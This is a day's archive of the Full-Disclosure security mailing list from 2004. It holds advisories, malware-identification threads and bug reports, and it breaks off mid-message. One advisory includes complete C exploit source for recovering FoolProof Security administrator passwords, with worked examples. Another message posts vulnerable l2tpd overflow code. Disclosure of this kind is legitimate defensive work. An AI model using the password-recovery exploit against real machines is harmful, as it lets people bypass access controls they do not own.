Location: Two Boots "Den of Cin" http://www.twoboots.com/theden/ 44 Avenue A (at E 3rd Street) underneath Two Boots Video. Speaker/Topic: Jamie Butler. Kernel Rootkits. I've seen the slidepack, and it was extremely interesting if you're interested in kernel rootkits, which you should be. It focuses on Win32, but touches on Linux. Jamie teaches a class on the subject that has gotten nothing but good reviews, so you should welcome this fre e chance to see what he's got going on. I've been told there will be demonstrati ons and other excitement. Extras: Free Soda and Pizza (toppings extra). Cash bar. Potential book raffle! Sponsor: Immunity, Inc. (www.immunitysec.com) RSVP Contact: Dave Aitel - dave at immunitysec.com Check the Daily Dave mailing list for updates and further information! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAwIElzOrqAtg8JS8RAsbqAJ98Y+Mx+/rhxwhBYeQV1SKIeGvQ6wCeIgvV /LtVWnzTk3wwKUHc8iD9Ua4= =nO5v -----END PGP SIGNATURE----- From alerts at integrigy.com Fri Jun 4 18:55:52 2004 From: alerts at integrigy.com (Integrigy Security) Date: Fri, 4 Jun 2004 12:55:52 -0500 Subject: [Full-Disclosure] Integrigy Security Alert - Multiple SQL Injection Vulnerabilities in Oracle E-Business Suite Message-ID: <20040604175702.9071E4153@mail.integrigy.com> ______________________________________________________________________ Integrigy Security Alert ______________________________________________________________________ Oracle E-Business Suite - Multiple SQL Injection Vulnerabilities June 3, 2004 ______________________________________________________________________ Summary: Multiple SQL injection vulnerabilities exist in the Oracle E-Business Suite 11i and Oracle Applications 11.0. These vulnerabilities can be remotely exploited simply using a browser and sending a specially crafted URL to the web server. A mandatory patch from Oracle is required to solve these security issues. Product: Oracle E-Business Suite Versions: 11.0.x, 11.5.1 - 11.5.8 Platforms: All platforms Risk Level: Critical _____________________________________________________________________ Description: Integrigy has discovered multiple SQL injection vulnerabilities in almost all supported versions of Oracle Applications (11.0 and 11i). Because Oracle Applications 11i installs code for all product modules, all Oracle Applications 11i customers are vulnerable to these SQL injection issues. A SQL injection vulnerability allows an attacker to execute SQL statements or database functions by inserting SQL code fragments into input fields of a web page. Due to the design of Oracle Applications, a SQL injection attack can easily and effectively compromise the entire database and application. Customers with Internet facing application servers are most vulnerable since these vulnerabilities can be exploited remotely using a browser. Since attacks can be specially crafted for Oracle Applications and an attack may only be a single HTTP Get or Post, successful attacks can be easily designed that will evade most intrusion detection and prevention systems. Solution: Oracle has released a patch for Oracle Applications 11.0 and the Oracle E-Business Suite 11i to correct these vulnerabilities. The following Oracle patches must be applied -- Version Patch ------- ----- 11i 3644626 (11.5.1 - 11.5.8) 11.0 3648066 (all versions) The patch availability matrix is available in Oracle Metalink Note ID 274375.1. Oracle Applications 11i customers that have applied both the Report Manager Mini-pack B (11i.FRM.B) or greater AND Marketing Suite Family Pack B (11i.MKT_PF.B) do NOT need to apply a patch for these vulnerabilities - these patch levels are included in 11.5.9. All Oracle Applications customers should consider this vulnerability extremely high risk and apply the above patch at the earliest possible opportunity. Customers with Internet facing application servers should apply the patch immediately. Appropriate testing and backups should be always performed before applying any patches. Additional Information: http://www.integrigy.com/resources.htm http://otn.oracle.com/deploy/security/pdf/2004alert67.pdf Metalink Note ID 274356.1 (Oracle Security Alert) Metalink Note ID 274375.1 (Patch Availability Matrix) For more information or questions regarding this security alert, please contact us at alerts at integrigy.com. Integrigy has included checks for these vulnerabilities in AppSentry, a vulnerability scanner for Oracle Applications, and AppDefend, an application intrusion prevention system for Oracle Applications. Credit: This vulnerability was discovered by Stephen Kost of Integrigy Corporation. ______________________________________________________________________ About Integrigy Corporation (www.integrigy.com) Integrigy Corporation is a leader in application security for large enterprise, mission critical applications. Our application vulnerability assessment tool, AppSentry, assists companies in securing their largest and most important applications. Integrigy Consulting offers security assessment services for leading ERP and CRM applications. For more information, visit www.integrigy.com. From derek at medien.akbild.ac.at Fri Jun 4 19:02:46 2004 From: derek at medien.akbild.ac.at (Derek) Date: Fri, 04 Jun 2004 19:02:46 +0100 Subject: [Full-Disclosure] Out of Office Message-ID: I am out of office until 10th of June, please be patient with the email correspondence to catch up. derek holzer From debian-security-announce at lists.debian.org Fri Jun 4 19:13:25 2004 From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org) Date: Fri, 4 Jun 2004 20:13:25 +0200 (CEST) Subject: [Full-Disclosure] [SECURITY] [DSA 514-1] New Linux 2.2.20 packages fix local root exploit (sparc) Message-ID: An embedded and charset-unspecified text was scrubbed... Name: not available Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040604/e1804639/attachment.ksh From PerrymonJ at bek.com Fri Jun 4 20:11:26 2004 From: PerrymonJ at bek.com (Perrymon, Josh L.) Date: Fri, 4 Jun 2004 14:11:26 -0500 Subject: [Full-Disclosure] another new worm submission Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> http://www.detroit-x.com/analysis.htm This is something we found this morning. I have packet captures that I will post. I have attached the infected files found with FPORT and also registry entries. We found this rebooting machines with the LSASS.exe error similar to Sasser. As of 6/4/2004 we found no virus defs to pick it up. Joshua Perrymon Sr. Network Security Consultant PGP Fingerprint 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 **********CONFIDENTIALITY NOTICE********** The information contained in this e-mail may be proprietary and/or privileged and is intended for the sole use of the individual or organization named above. If you are not the intended recipient or an authorized representative of the intended recipient, any review, copying or distribution of this e-mail and its attachments, if any, is prohibited. If you have received this e-mail in error, please notify the sender immediately by return e-mail and delete this message from your system. From aluigi at altervista.org Fri Jun 4 20:24:11 2004 From: aluigi at altervista.org (Luigi Auriemma) Date: Fri, 4 Jun 2004 19:24:11 +0000 Subject: [Full-Disclosure] Colin McRae Rally 04 broadcast clients crash Message-ID: <20040604192411.7ee71a81.aluigi@altervista.org> ####################################################################### Luigi Auriemma Application: Colin McRae Rally 04 http://www.codemasters.com/colinmcraerally04/ Versions: 1.0 Platforms: Windows Bug: bad allocation (?) Risk: medium Exploitation: remote, versus clients (broadcast) Date: 04 June 2004 Author: Luigi Auriemma e-mail: aluigi at altervista.org web: http://aluigi.altervista.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Colin McRae Rally 04 is the famous rally game developed by Codemasters and released at the beginning of April 2004. ####################################################################### ====== 2) Bug ====== The bug is in a value that the servers send back to the clients when they enter in the multiplayer menu. The bugged value is the number of players in the server ("numplayers"), if it is too high it causes the crash of the client. Due the location of the bug, any vulnerable client can't play online because it automatically requests informations to all the online servers so a single malicious server can passively block the entire game network. ####################################################################### =========== 3) The Code =========== http://aluigi.altervista.org/poc/cmr4cdos.zip ####################################################################### ====== 4) Fix ====== No fix. Two months for a patch is not what I mean with "quick fix". The bug was found just two days after the pubblic release of the game and quickly noticed to the developers, but no patch has been released yet. ####################################################################### --- Luigi Auriemma http://aluigi.altervista.org From thomas-bugtraq at unproved.org Fri Jun 4 19:53:52 2004 From: thomas-bugtraq at unproved.org (Thomas Walpuski) Date: Fri, 4 Jun 2004 18:53:52 +0000 Subject: [Full-Disclosure] bss-based buffer overflow in l2tpd Message-ID: <20040604185352.GA4800@unproved.org> All versions of l2tpd contain a bss-based buffer overflow. After circumventing some minor obstacles (i.e., faking a L2TP tunnel establishment) the overflow can be triggered by sending a specially crafted packet. The crucial code can be found in write_packet() in control.c: static unsigned char wbuf[MAX_RECV_SIZE]; int pos = 0; [..] e = PPP_FLAG; wbuf[pos++] = e; for (x = 0; x < buf->len; x++) { e = *((char *) buf->start + x); if ((e < 0x20) || (e == PPP_ESCAPE) || (e == PPP_FLAG)) { /* Escape this */ e = e ^ 0x20; wbuf[pos++] = PPP_ESCAPE; } wbuf[pos++] = e; } wbuf[pos++] = PPP_FLAG; Nota bene: buf->len can be upto 4080 = 4096 (=: MAX_RECV_SIZE) - 16. It might be hard or even impossible to exploit this buffer overflow. Thomas Walpuski From koon at gentoo.org Fri Jun 4 20:30:59 2004 From: koon at gentoo.org (Thierry Carrez) Date: Fri, 04 Jun 2004 21:30:59 +0200 Subject: [Full-Disclosure] [ GLSA 200406-01 ] Ethereal: Multiple security problems Message-ID: <40C0CDF3.4080003@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200406-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Ethereal: Multiple security problems Date: June 04, 2004 Bugs: #51022 ID: 200406-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities including one buffer overflow exist in Ethereal, which may allow an attacker to run arbitrary code or crash the program. Background ========== Ethereal is a feature rich network protocol analyzer. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/ethereal <= 0.10.3 >= 0.10.4 Description =========== There are multiple vulnerabilities in versions of Ethereal earlier than 0.10.4, including: * A buffer overflow in the MMSE dissector. * Under specific conditions a SIP packet could make Ethereal crash. * The AIM dissector could throw an assertion, causing Ethereal to crash. * The SPNEGO dissector could dereference a null pointer, causing a crash. Impact ====== An attacker could use these vulnerabilities to crash Ethereal or even execute arbitrary code with the permissions of the user running Ethereal, which could be the root user. Workaround ========== For a temporary workaround you can disable all affected protocol dissectors by selecting Analyze->Enabled Protocols... and deselecting them from the list. However, it is strongly recommended to upgrade to the latest stable release. Resolution ========== All Ethereal users should upgrade to the latest stable version: # emerge sync # emerge -pv ">=net-analyzer/ethereal-0.10.4" # emerge ">=net-analyzer/ethereal-0.10.4" References ========== [ 1 ] Ethereal enpa-sa-00014 http://www.ethereal.com/appnotes/enpa-sa-00014.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAwM3zvcL1obalX08RAhWVAJ9e+BRSYi4AZA3Us7+0ib59Qyrk4gCcCdtJ LqivdVf6W1IyR49JPaAOoMc= =P4XV -----END PGP SIGNATURE----- From galt at locutus.isu.edu Fri Jun 4 20:57:16 2004 From: galt at locutus.isu.edu (John Galt) Date: Fri, 4 Jun 2004 13:57:16 -0600 (MDT) Subject: [Full-Disclosure] Out of Office In-Reply-To: References: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 How much do you want to bet that he will be 0wned before then? ;P On Fri, 4 Jun 2004, Derek wrote: > I am out of office until 10th of June, please be patient > with the email correspondence to catch up. > > derek holzer > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > - -- The Internet must be a medium for it is neither Rare nor Well done! John Galt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Made with pgp4pine 1.76 iD8DBQFAwNQm+TX+nYGFQPsRAuAcAJ9Aii7ETU/Rq9UwTHRaJW5cfLcFeACgpWOH DaYREnElW6KGr8Uu98bz5Ys= =kRgL -----END PGP SIGNATURE----- From api at epost.de Fri Jun 4 21:22:16 2004 From: api at epost.de (Axel Pettinger) Date: Fri, 04 Jun 2004 22:22:16 +0200 Subject: [Full-Disclosure] another new worm submission References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> Message-ID: <40C0D9F8.2FD2E679@epost.de> "Perrymon, Josh L." wrote: > > http://www.detroit-x.com/analysis.htm > > This is something we found this morning. I have packet captures that I > will post. > I have attached the infected files found with FPORT and also registry > entries. > > We found this rebooting machines with the LSASS.exe error similar to > Sasser. As of 6/4/2004 we found no virus defs to pick it up. The malware (MD5: 2501c5d989229a6ab02146f7d2c1f6d8) is identified as ... BitDefender : Backdoor.Dumador.AI CA Vet : Win32.Bambo.L trojan DrWeb : BackDoor.Dumaru Eset : Win32/Dumador.AI trojan Kaspersky : Backdoor.Dumador.ai McAfee : BackDoor-CCT Symantec : Backdoor.Nibu.G Trend Micro : TROJ_DUMARIN.H Description: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DUMARIN.H&VSect=T Regards, Axel Pettinger From insecure at ameritech.net Fri Jun 4 21:55:05 2004 From: insecure at ameritech.net (insecure) Date: Fri, 04 Jun 2004 15:55:05 -0500 Subject: [Full-Disclosure] another new worm submission In-Reply-To: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> Message-ID: <40C0E1A9.5080705@ameritech.net> Perrymon, Josh L. wrote: >http://www.detroit-x.com/analysis.htm > >This is something we found this morning. I have packet captures that I will >post. >I have attached the infected files found with FPORT and also registry >entries. > >We found this rebooting machines with the LSASS.exe error similar to Sasser. >As of 6/4/2004 we found no virus defs to pick it up. > > >Joshua Perrymon >Sr. Network Security Consultant > > > McAfee 7.1.0 with DAT 4364 (6/2/04) detects it as BackDoor-CCT. This is not a worm, it's a trojan. Your systems are being remotely compromised, possibly with an auto-rooter targeting the lsass vulnerability, which instructs the compromised system to download, install, and run this trojan. This trojan includes a keystroke logger, and additional components that you seem to have missed. Assume that system and any web site passwords have been compromised. Warn the users of these systems that unless they change any financial site passwords they are likely to be victims of theft. How are these system getting compromised? Why don't you have this patch deployed yet? Why are these systems reachable from the Internet over port 445? You've got more problems than new worms. From koon at gentoo.org Fri Jun 4 22:44:37 2004 From: koon at gentoo.org (Thierry Carrez) Date: Fri, 04 Jun 2004 23:44:37 +0200 Subject: [Full-Disclosure] [ GLSA 200406-02 ] tripwire: Format string vulnerability Message-ID: <40C0ED45.9080602@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200406-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: tripwire: Format string vulnerability Date: June 04, 2004 Bugs: #52945 ID: 200406-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability allowing arbitrary code execution under certain circumstances has been found. Background ========== tripwire is an open source file integrity checker. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-admin/tripwire <= 2.3.1.2 >= 2.3.1.2-r1 Description =========== The code that generates email reports contains a format string vulnerability in pipedmailmessage.cpp. Impact ====== With a carefully crafted filename on a local filesystem an attacker could cause execution of arbitrary code with permissions of the user running tripwire, which could be the root user. Workaround ========== There is no known workaround at this time. Resolution ========== All tripwire users should upgrade to the latest stable version: # emerge sync # emerge -pv ">=app-admin/tripwire-2.3.1.2-r1" # emerge ">=app-admin/tripwire-2.3.1.2-r1" References ========== [ 1 ] Bugtraq Announcement http://www.securityfocus.com/archive/1/365036/2004-05-31/2004-06-06/0 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAwO1FvcL1obalX08RAkrZAJ9Q7rq0lHme7mugx5gqNJsQA1+4fACgoByQ 1bQVhKo0jRXswMknBjPSVn4= =t7dZ -----END PGP SIGNATURE----- From pauls at utdallas.edu Fri Jun 4 23:05:45 2004 From: pauls at utdallas.edu (Paul Schmehl) Date: Fri, 04 Jun 2004 17:05:45 -0500 Subject: [Full-Disclosure] another new worm submission In-Reply-To: <40C0E1A9.5080705@ameritech.net> References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> <40C0E1A9.5080705@ameritech.net> Message-ID: <47190000.1086386745@utd49554.utdallas.edu> --On Friday, June 04, 2004 03:55:05 PM -0500 insecure wrote: > > McAfee 7.1.0 with DAT 4364 (6/2/04) detects it as BackDoor-CCT. This is > not a worm, it's a trojan. Your systems are being remotely compromised, > possibly with an auto-rooter targeting the lsass vulnerability, which > instructs the compromised system to download, install, and run this > trojan. This trojan includes a keystroke logger, and additional > components that you seem to have missed. Assume that system and any web > site passwords have been compromised. Warn the users of these systems > that unless they change any financial site passwords they are likely to > be victims of theft. > > How are these system getting compromised? Why don't you have this patch > deployed yet? Why are these systems reachable from the Internet over port > 445? > For someone who knows nothing about his network, you sure are willing to make a lot of assumptions. You admit you don't know how the systems were compromised and you don't know what compromised them, yet you castigate him for leaving port 445 open and not patching and you assume this happened *remotely*? > You've got more problems than new worms. > One of which is miserable comforters. Paul Schmehl (pauls at utdallas.edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ From randallm at fidmail.com Sat Jun 5 00:30:23 2004 From: randallm at fidmail.com (RandallM) Date: Fri, 4 Jun 2004 18:30:23 -0500 Subject: [Full-Disclosure] xabot or sdbot or spybot... Message-ID: <200406042330.i54NUBv04878@netsys.com> --__--__-- >Message: 21 >Date: Fri, 04 Jun 2004 00:08:23 +0200 >From: Axel Pettinger >Organization: API >To: "Perrymon, Josh L." , full-disclosure at netsys.com >Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? >"Perrymon, Josh L." wrote: >> >> I found this worm/ trojan on a laptop. Ran FPort and found the .exe. >> Doesn't look like it propagates to other machines but rather communicates >> with a compromised >> web companies server using IRC. The compromised server has removed the IRC >> service. Only sends RST packets back. >> > >> I would like to know the attack vectors. I'm guessing LSASS. >AntiVirus scanners identify our trojan as: >BitDefender : Backdoor.SDBot.Gen >Kaspersky : Backdoor.Rbot.gen >McAfee : W32/Sdbot.worm.gen.g >Symantec : W32.Spybot.Worm >Trend Micro : WORM_SPYBOT.AP >From a quick look at the file I'd say the following is the best >description of that trojan. There're several attack vectors ... >http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT .AP&VSect=T >Regards, >Axel Pettinger I'd like to throw something in here. While scanning with Spybot 1.3 it came to a halt with an error. The error was an "Xabot" error. After many attempts to figure this out I searched Xabot. This lead to Symantics site http://securityresponse.symantec.com/avcenter/venc/data/w32.xabot.worm.html and http://www.sophos.com/virusinfo/analyses/w32sdbotna.html where it is associated with Sdbot. Well, for sure I am having a hell of a time finding it as all conventional means have failed. 3 online scans. 3 scans in safe mode. Hijack This, Swat-it, Bazooka and still Spybot is halted with the error. I uninstalled Spybot three times. It seems I have a remnant somewhere. thank you Randall M ? From advisories at cyrillium.com Fri Jun 4 23:30:48 2004 From: advisories at cyrillium.com (advisories at cyrillium.com) Date: Fri, 4 Jun 2004 18:30:48 -0400 (EDT) Subject: [Full-Disclosure] [CYSA-0329] Password recovery vulnerability in FoolProof Security 3.9.x for Windows 95/9 Message-ID: <200406042230.i54MUmv20169@netsys.com> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cyrillium Security Advisory CYSA-0329 advisories at cyrillium.com http://www.cyrillium.com/ Cyrillium Security Solutions and Services April 29th, 2004 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Severity: High (Password Compromise) Vendor: SmartStuff Software (member of Riverdeep Interactive Learning, Inc.) Affected Products: FoolProof Security 3.9.x for Windows 98/98SE/Me Unaffected Products: FoolProof Security for Macintosh FoolProof Security for Windows XP and Windows 2000 1. Problem Description Cyrillium Security Solutions and Services has discovered a vulnerability in the password recovery feature of FoolProof Security that allows an attacker to recover the "Administrator" password using the "Control" password and password recovery key. FoolProof for Macintosh and FoolProof for Windows XP & 2000 are not affected because they do not support the password recovery feature. 2. Details Passwords are stored as 16-byte, zero-padded ASCII strings. When FoolProof Security is installed, an "Administrator" password must be specified. Either the "Administrator" password or the "Control" password may be used to access the FoolProof control panel and to bypass the Bootlock and Keylock protection features. If the "Control" password is forgotten or compromised, the "Administrator" password can be used to either enter the FoolProof control panel to change the "Control" password or to determine the "Control" password from the password recovery key. The password recovery key is a 32-character hexadecimal string that can be obtained by holding down the Shift key and pressing "OK" in the FoolProof control panel's initial password dialog box. The ADMINPW.EXE program on the FoolProof Security installation diskette calculates the "Control" password from the "Administrator" password and the password recovery key. The ADMINPW.EXE program combines the zero-padded "Administrator" password with the password recovery key using the bitwise exclusive OR (XOR) operation. Next, the ASCII string "D:SKFOIK@(*EHJFL" is subtracted from the previous result (one byte at a time). The final result is the "Control" password. If C represents the "Control" password, A represents the "Administrator" password, B represents the ASCII string "D:SKFOIJ@(*EHJFL", and K represents the password recovery key, then manipulating the formula: C = (A xor K) - B yields: A = (C + B) xor K Thus, the "Administrator" password can be calculated if the "Control" password and password recovery key are known. The password recovery key is trivial to obtain by holding down the Shift key and pressing "OK" in the FoolProof control panel's initial password dialog box. If the "Control" password is compromised, the "Administrator" password can be compromised as well. Example: Administrator password is "12345": A = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (hexadecimal) Control password is "HelloWorld": C = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00 Recovery key (reported by FoolProof control panel): K = BD AD 8C 83 80 A6 B8 BC AC 8C 2A 45 48 4A 46 4C Offsets (constant): B = 44 3A 53 4B 46 4F 49 4A 40 28 2A 45 48 4A 46 4C Recovery process (ADMINPW.EXE algorithm): A xor K = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C (A xor K) - B = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00 (A xor K) - B = "HelloWorld" = Control password Reverse recovery process: C + B = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C (C + B) xor K = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (C + B) xor K = "12345" = Administrator password The "Administrator" password can be successfully determined knowing only the "Control" password and the password recovery key. 4. Exploit The following program calculates the "Administrator" password from the password recovery key and the "Control" password. Usage: Invoke the program with the following arguments: foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD Example: C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld 12345 Source code: /* foolpw.c Copyright (C) 2004 Cyrillium Security Solutions and Services. Demonstrates a weakness in FoolProof Security password recovery system. See CYSA-0329 for details. CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. */ #include #include #include int main (int argc, char *argv[]) { int i; /* Index variable */ char a, /* Temporary variable for calculations */ k[33], /* Recovery key in hexadecimal */ k_array[17], /* Recovery key as array */ c[17], /* Control password */ *b = "D:SKFOIJ@(*EHJFL", /* Offsets */ hex_temp[2], /* Temporary storage for hexadecimal conversion */ *endptr; /* Output variable for strtoul */ if (argc != 3) { puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD"); return 1; } if (strlen (argv[1]) != 16*2) { puts ("Recovery key must be 16 hexadecimal bytes (32 characters)"); return 1; } if (strlen (argv[2]) > 16) { puts ("Passwords are limited to 16 characters"); return 1; } memset (k, 0, sizeof (b)); memset (k_array, 0, sizeof (b)); memset (c, 0, sizeof (c)); memset (hex_temp, 0, sizeof (hex_temp)); strcpy (k, argv[1]); strcpy (c, argv[2]); for (i = 0; i < 16; i++) { memcpy (hex_temp, &k[i*2], 2); k_array[i] = strtoul (hex_temp, &endptr, 16); if (*endptr != '\0') { printf("\nInvalid hexadecimal character \'%c\'\n", *endptr); return 1; } a = (c[i] + b[i]) ^ k_array[i]; putc (a, stdout); } puts (""); return 0; } 5. Solution Users who know the "Administrator" password can enter the FoolProof control panel and bypass Bootlock/Keylock on any computer that has the same "Administrator" password as the compromised computer. To change the "Administrator" password, FoolProof Security must be reinstalled. Upgrading to FoolProof Security 4.0 or higher is recommended because the password recovery feature has been removed. However, FoolProof versions 4.0 and higher do not support Windows 95, Windows 98, or Windows Me. Remember to read the uninstallation and upgrade instructions before upgrading FoolProof Security, especially if you are using Bootlock/Keylock. Improper uninstallation or upgrading could cause your computer to fail to boot. 6. References 1. SmartStuff Software: 2. Riverdeep Interactive Learning, Inc.: 7. Copyright Copyright (C) 2004 Cyrillium Security Solutions and Services. All rights reserved. Permission is granted to redistribute unmodified copies of this advisory. From insecure at ameritech.net Sat Jun 5 03:54:32 2004 From: insecure at ameritech.net (Jerry Heidtke) Date: Fri, 04 Jun 2004 19:54:32 -0700 Subject: [Full-Disclosure] another new worm submission In-Reply-To: <47190000.1086386745@utd49554.utdallas.edu> References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> <40C0E1A9.5080705@ameritech.net> <47190000.1086386745@utd49554.utdallas.edu> Message-ID: <40C135E8.9030700@ameritech.net> Paul Schmehl wrote: > --On Friday, June 04, 2004 03:55:05 PM -0500 insecure > wrote: > >> >> McAfee 7.1.0 with DAT 4364 (6/2/04) detects it as BackDoor-CCT. This is >> not a worm, it's a trojan. Your systems are being remotely compromised, >> possibly with an auto-rooter targeting the lsass vulnerability, which >> instructs the compromised system to download, install, and run this >> trojan. This trojan includes a keystroke logger, and additional >> components that you seem to have missed. Assume that system and any web >> site passwords have been compromised. Warn the users of these systems >> that unless they change any financial site passwords they are likely to >> be victims of theft. >> >> How are these system getting compromised? Why don't you have this patch >> deployed yet? Why are these systems reachable from the Internet over >> port >> 445? >> > For someone who knows nothing about his network, you sure are willing > to make a lot of assumptions. You admit you don't know how the systems > were compromised and you don't know what compromised them, yet you > castigate him for leaving port 445 open and not patching and you > assume this happened *remotely*? > >> You've got more problems than new worms. >> > One of which is miserable comforters. > > Paul Schmehl (pauls at utdallas.edu) > Adjunct Information Security Officer > The University of Texas at Dallas > AVIEN Founding Member > http://www.utdallas.edu/ir/security/ You're right, I made an assumption that the systems were being compromised remotely rather than being deliberately and maliciously hacked by insiders. Would this somehow be less of a problem? Having systems with routable addresses reachable through port 445 is the most likely avenue of compromise, if this is not the case then Josh would be well advised to determine exactly what is going on with his network. He did say there were more than one infected system that were displaying symptoms of attack against lsass, and that he couldn't find AV definitions to pick it up, although it's been detectable as a variant for up to six weeks, and someone else posted detections by 8 different AV packages. I also stated that there are other components which he didn't find, which was another assumption but one which is proven true by a quick perusal of any AV vendors' write-up on this. Since the malware he posted doesn't spread automatically and doesn't attack lsass, there is obviously something else going on, which was the point I was trying to make. Apparently I was too obtuse for some people. I think I suggested some avenues of investigation that may prove helpful to the OP. In what way were your comments helpful? From aditya.deshmukh at online.gateway.technolabs.net Sat Jun 5 02:16:27 2004 From: aditya.deshmukh at online.gateway.technolabs.net (Aditya, ALD [Aditya Lalit Deshmukh]) Date: Sat, 5 Jun 2004 06:46:27 +0530 Subject: [Full-Disclosure] Using Xbox live for covert communication In-Reply-To: <9BA6DCC15456CC46894E77233173DD7C157A3905@UCMAIL5> Message-ID: > > Then why not find a friend in germany and pretend to plan a biological > attack? > See how "un-monitored" and "private" it is then-:) > worth a try for securitys sake ? yes! ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) From fd at proclaimed.net Sat Jun 5 02:32:20 2004 From: fd at proclaimed.net (fd at proclaimed.net) Date: Fri, 4 Jun 2004 21:32:20 -0400 Subject: [Full-Disclosure] weather.com contact Message-ID: <000901c44a9c$f6eb8400$547abe18@proclaimed> Anyone know anyone at weather.com? From tarundua at linux-delhi.org Sat Jun 5 07:40:49 2004 From: tarundua at linux-delhi.org (tarundua at linux-delhi.org) Date: Sat, 5 Jun 2004 12:10:49 +0530 Subject: [Full-Disclosure] Re: Here Message-ID: <200406050633.i556XNv24545@netsys.com> Your file is attached. -------------- next part -------------- A non-text attachment was scrubbed... Name: yours.pif Type: application/octet-stream Size: 17920 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040605/0fcd4d05/attachment.obj From lcamtuf at ghettot.org Sat Jun 5 10:26:23 2004 From: lcamtuf at ghettot.org (Michal Zalewski) Date: Sat, 5 Jun 2004 11:26:23 +0200 (CEST) Subject: [Full-Disclosure] weather.com contact In-Reply-To: <000901c44a9c$f6eb8400$547abe18@proclaimed> References: <000901c44a9c$f6eb8400$547abe18@proclaimed> Message-ID: <20040605112540.H75779@dekadens.coredump.cx> On 